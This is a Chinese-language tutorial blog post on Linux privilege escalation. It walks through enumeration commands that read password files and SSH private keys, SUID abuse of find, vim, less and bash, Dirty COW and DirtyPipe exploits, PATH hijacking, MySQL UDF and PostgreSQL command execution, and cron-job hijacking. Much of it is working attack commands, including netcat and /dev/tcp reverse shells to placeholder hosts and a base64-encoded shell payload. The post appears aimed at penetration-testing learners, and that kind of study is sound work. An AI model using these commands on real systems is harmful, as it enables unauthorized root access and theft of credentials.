前言
发点存货
LINUX权限简介
在学习提权之前我们先了解一下linux里面的权限我们使用命令:
ls -al
即可查看列出文件所属的权限:
文件头前面都有一段类似的字符,下面我们仔细分析一下里面符号分别代表什么。
-rw-r--r-- 1 root root
第一个符号-的地方,可以是下面这些符号:
- : 代表普通文件
d:代表目录
l:代表软链接
b:代表块文件
c:代表字符设备
而后面的
rw-r--r--
表示的是文件所属的权限
r : 文件可读。w : 文件可修改。- : 表示暂时没有其他权限。x : 表示可执行
rw- 表示文件所拥有者的权限。
r-- 表示文件所在组的用户的权限。
r-- 表示其他组的用户的权限。
但如果是一个目录的话可以看下面的解读:
r 表示可以进入该目录进行查看。 w 表示文件可以进行增加。x 表示可以进入这个目录
后面的数据1代表的内容如下:
如果文件类型为目录,表示目录下的子目录个数
如果文件类型是普通文件,这个数据就表示这个文件的硬链接个数
后面两个root的分别含义就是:第一个为该文件所有者为root 用户,第二个表示该文件所在组为root组。
信息收集
在提权之前我们要进行信息收集,例如系统信息,用户信息,安装的服务,计划任务等能被我们进一步利用的信息,这些信息在我们提权时会用到,因为这不是本文的重点于是就放一些链接大家去了解一下:
https://www.cnblogs.com/lzkalislw/p/15630934.html
下面就简单举一些经常需要用的信息收集命令:
查看系统信息(可用于内核提权)
uname -a 打印所有可用的系统信息
uname -r 内核版本
uname -n 系统主机名。
uname -m 查看系统内核架构(64位/32位)
hostname 系统主机名
cat /proc/version 内核信息
cat /etc/*-release 分发信息
cat /etc/issue 分发信息
cat /proc/cpuinfo CPU信息
cat /etc/lsb-release # Debian
cat /etc/redhat-release # Redhat
用户和群组
cat /etc/passwd 列出系统上的所有用户
cat /var/mail/root
cat /var/spool/mail/root
cat /etc/group 列出系统上的所有组
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' 列出所有的超级用户账户
whoami 查看当前用户
w 谁目前已登录,他们正在做什么
last 最后登录用户的列表
lastlog 所有用户上次登录的信息
lastlog –u %username% 有关指定用户上次登录的信息
用户权限信息
whoami 当前用户名
id 当前用户信息
cat /etc/sudoers 谁被允许以root身份执行
sudo -l 当前用户可以以root身份执行操作
环境信息
env 显示环境变量
set 现实环境变量
echo %PATH 路径信息
history 显示当前用户的历史命令记录
pwd 输出工作目录
cat /etc/profile 显示默认系统变量
cat /etc/shells 显示可用的shellrc
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
进程和服务
ps aux
ps -ef
top
cat /etc/services
查看以root 运行的进程
ps aux | grep root
ps -ef | grep root
查看安装的软件(可用于第三方服务提权)
ls -alh /usr/bin/
ls -alh /sbin/
ls -alh /var/cache/yum/
dpkg -l
服务/插件
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/
计划任务(可用于计划任务提权)
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
有无明文存放用户密码
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find , -name "*.php" -print0 | xargs -0 grep -i -n "var $password"
有无ssh 私钥
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
可提权SUID && GUID(用于SUID提权)
find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
查看可写/执行目录
find / -writable -type d 2>/dev/null # world-writeable folders
find / -perm -222 -type d 2>/dev/null # world-writeable folders
find / -perm -o w -type d 2>/dev/null # world-writeable folders
find / -perm -o x -type d 2>/dev/null # world-executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders
查看安装过的工具
find / -name perl*
find / -name python*
find / -name gcc*
...
信息收集工具
通过上面这些命令可以看到如果我们一个一个的去查是很麻烦的,这里推荐大家使用信息收集脚本LinEnum.sh来去进行信息收集。
官方链接:https://github.com/rebootuser/LinEnum
下载后解压,先赋予LinEnum.sh执行权限:
chmod +x LinEnum.sh
之后就可以运行该脚本了:
./LinEnum.sh -r report -e /tmp/ -t #-e:将生成的一系列文件存放在何处,此处我们存放在靶机的/tmp目录下
这样就方便了我们进行下一步操作了,只需要在里面找能利用的数据就可以了。
SUID提权
要先了解SUID是什么:
SUID (Set UID)是Linux中的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID权限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义.
在执行过程中,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果ls设置了SUID权限,我们可在非root用户下运行该二进制可执行文件,在执行文件时,该进程的权限将为root权限.
利用此特性,我们可通过SUID进行提权
设置SUID权限:
chmod u+s filename 设置SUID位
chmod u-s filename 去掉SUID设置
假设我们给一个文件赋予SUID权限:
赋予权限之后的文件信息为:
代表该文件已经获得了suid权限,这就是个人对于SUID的简单理解,那么该怎样利用呢。
我们先看一下常用的具有SUID权限的文件有哪些,常用命令如下:
find / -perm -u=s -type f 2>/dev/null #-type b/d/c/p/l/f 查是块设备,目录,字符设备,管道.符号链接,普通文件
# 2>/dev/null 将find报错的信息重定向到null[空]
可以看到查询到了具有SUID权限的文件,包括上面我们增加了SUID权限的文件,当然简单总结一下我们常用SUID提权文件如下:
nmap
vim
find
bash
more
less
nano
cp
awk
下面简单举一些SUID提权的例子:
find
find是我们在linux中查找文件经常用到的命令,提权过程如下:
cd /tmp;touch xxx 随便创建一个文件可以在tmp目录下
find xxx -exec whoami \;
find xxx -exec /bin/sh \; 利用find得到一个root权限的shell
find xxx -exec nc -lvp 1234 -e /bin/sh \;利用nc反弹一个root权限的shell
namp
namp作为一个端口扫描工具被人们熟知,当目标主机存在版本在 2.02-5.21 之间的 nmap也是可以尝试SUID提权的,接下来给大家讲一下步骤:
早期nmap中有交互模式,我们可以用以下命令进入:
nmap --interactive //进入交互模式
然后我们在交互模式中输入以下命令进行提权:
nmap> !sh
sh-3.2# whoami
root
如果读者觉得手动比较麻烦,我们可以在MSF里寻找攻击脚本:
bash
我们可以用命令通过一个ROOT权限来打开bash shell:
bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
VIM
vim作为一款linux下的文件编辑器,当以SUID运行的话,它会继承root用户的权限:
vim.tiny
# Press ESC key
:set shell=/bin/sh
:shell
nano
nano是Unix和类Unix系统中的一个文本编辑器,我们也可以利用它来提权:
nano
Ctrl + R
Ctrl + X
即可进入命令行
less/more
less命令用于显示文件或命令输出的内容,它一次只显示一个页面(分页显示工具)。它类似于more命令,而且他们两个的提权方法基本一致,但需要注意的是只有比较大的文件才能进行翻页:
less(or more) /etc/passwd
#在less(or more)中输入:
!/bin/sh
perl
perl命令作为linux中常用脚本也是可以进行提权的:
sudo perl -e 'exec "/bin/sh";'
ed
ed是Linux中功能最简单的文本编辑程序,一次仅能编辑一行而非全屏幕方式的操作。
内核漏洞提权
即通过系统的内核漏洞来进行提权,因为涉及的范围比较多,作为入门就以最著名的CVE-2016-5195(脏牛漏洞)来作为演示
dirtycow-exp:https://github.com/gbonacini/CVE-2016-5195
dirtycow-检测脚本:https://github.com/aishee/scan-dirtycow/blob/master/dirtycowscan.sh
当我们获取服务器普通用户的权限后,可以尝试以下思路来进行脏牛提权:
上传脏牛检测脚本-检测疑似存在漏洞-上传脏牛exp-提权成功
我们需要检测系统内核版本:
# 查看系统发行版本
lsb_release -a
# 查看内核版本
uname -a
当发现版本内核在脏牛影响的范围内时,拿到用户权限后将检测脚本上传至靶机:
upload /root/linux-exploit-suggester.sh /tmp/xino.sh
然后赋予该探针执行权限:
chmod 777 xino.sh
若要检测到存在,则继续上传我们下载的提权EXP来进行提权操作,注意的是上传的exp需要进行编译:
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
执行后可得到root权限,提权脚本还可以通过searchsploit下载到本地:
searchsploit dirty
其他内核漏洞举例:
5.8 <= Linux kernel < 5.16.11/5.15.25/5.10.102 https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit
环境变量提权
PATH是Linux和类UNIX系统中的环境变量,指定存储可执行程序的所有bin和sbin目录,通过PATH变量来响应用户执行的命令,并向shell发送请求以搜索可执行文件。
使用命令查看当前环境变量:
我们写一段demo:
#include
void main() {
setuid(0);
setgid(0);
system("su - xino");
}
意思是通过root权限切换到xino用户,我们需要编译一下并赋予suid权限:
gcc demo.c -o shell
chmod u+s shell
当我们在服务器ls一下后发现了shell我们构造的shell文件,执行后发现当前用户切换了:
ls
./shell
了解到这里之后,我们思考一下,用户的环境变量可以自定义,那我们让另一个位置的环境配置在当前环境之前,就可以进行环境变量的劫持了。
echo命令法
echo "/bin/bash" > /tmp/su
chmod 777 /tmp/su
echo $PATH
export PATH=/tmp:$PATH
cd /srv
./shell
cp法
cp /bin/sh /tmp/su
export PATH=/tmp:$PATH
cd /srv
./shell
软链接法
ln -s /bin/sh /tmp/su
export PATH=/tmp:$PATH
cd /srv
./shell
第三方服务提权
这个思路是用第三方服务的漏洞可以拿到主机的 root 权限,比如某个组件通过root权限启动,那么我们控制了组件就相当于得到了root权限。
MySQL UDF 提权
UDF(Userdefined function)可翻译为用户自定义函数,其为mysql的一个拓展接口,可以为mysql增添一些函数。提权条件如下:
1.必须是root权限(需要创建和抛弃自定义函数)
2.secure_file_priv=(必须为空,secure_file_priv为null或者为/tmp/都不行,因为它需要在指定的位置写入udf文件)
查看是否有写入权限:
show global variables like '%secure%';
当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入或者导出做限制,此时可提权。限制条件如下:
mysql>5.1 mysql\lib\plugin
mysql<5.1 c:\\windows
可能读者不太明白限制条件是什么意思,如果我们要提权那么就要上传UDF 的动态链接库文件(实现共享函数库概念的一种方式),我们可以在SQLMAP(sqlmap\data\udf\mysql)或者MSF中找到内置的udf.dll文件,而这个udf.dll文件上传路径的限制条件就是上面提到的。下一步就是上传udf.dll文件,这里分为两种情况:
1.拥有webshell权限时
我们可以直接将udf.dll上传到指定目录的文件夹。
2.未拥有webshell权限时
由于我们不能直接上传了,所以需要通过查询语句来转码插入udf.dll的内容:
use mysql;
set @a=concat('',0x代码);
create table Ghost(data LONGBLOB);
insert into Ghost values("");update Ghost set data = @a;
代码为select hex(load_file('c:/udf.dll'))中的内容
select data from Ghost into dumpfile 'c:/phpStudy/MySQL/lib/plugin/udf.dll'; //导出ufd.dll
CREATE FUNCTION backshell RETURNS STRING SONAME 'udf.dll';//创建函数
select sys_exec('nc xxxx 6666 -e /bin/bash'); #执行
之后我们就提权成功了,监听一下就可以。
PostgreSQL
PostgreSQL是Mac OSX系统下最常用的数据库,当其版本位于9.3-11.2,允许经过身份验证的superuser或者拥有pg_read_server_files权限的用户执行任意命令。基本流程如下:
drop table if exists cmd_exec; #先删除你想要使用但是已经存在的表
create table cmd_exec(cmd_output text); #创建保存系统命令输出的表
copy cmd_exec from program 'id'; #执行系统命令利用特定函数
select * from cmd_exec; #查看执行结果
而cmd_exec中的内容可以是反弹shell:
COPY cmd_exec FROM PROGRAM '/bin/bash -i >& /dev/tcp/xxxx/xx 0>&1';
不过需要注意的是直接这样写会执行失败,我们需要将反弹shell的命令进行base64编码再传入:
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL3h4eHgveHggMD4mMQ==
计划任务提权
定时任务(cron job)可以用来设置周期执行的命令,提权的原理为计划任务以root权限运行,计划任务中的脚本其他用户有写入的权限,或者脚本所属组为其他用户,则可以进行计划任务提权。
crontabs基本格式如上图,假设我们设置了一个计划任务xino.py:
import os
import sys
try:
os.system('rm -r /home/xino/*')
except:
sys.exit()
删除xino目录下的所有文件,作为普通用户我们首先进入目录查看:
cat /etc/crontab
ls -al /tmp/xino.py
cat /tmp/xino.py
去修改这个计划任务来进行提权:
#!/user/bin/env python
import os
import sys
try:
os.system(‘chmod u+s /bin/bash’)
except:
sys.exit
上面代码大家应该不陌生,这涉及了上面的SUID提权,设置完后使用命令:
ls -la /bin/bash
发现属主的权限由x变成了s,成功设置了SUID权限,运行命令:
sudo bash -p
查询用户成功变成了root,提权就成功了。
漏洞探针
了解了以上提权的方法,因为我们在实战中不可能一个一个方法的去试,这样的话效率就太低了,这里给大家介绍一个漏洞探针工具linux-exploit-suggster2,该工具可以帮我们检查该系统当前可能存在的漏洞,我们只需要尝试去攻击。
官网链接:https://github.com/jondonas/linux-exploit-suggester-2
运用方法也很简单,解压后直接运行即可:
$ ./linux-exploit-suggester-2.pl
Local Kernel: 4.4.0
Searching among 73 exploits...
结语
因为提权的内容太多了,本文就简单总结了一下具有代表性的一些知识点,望大家多多包涵。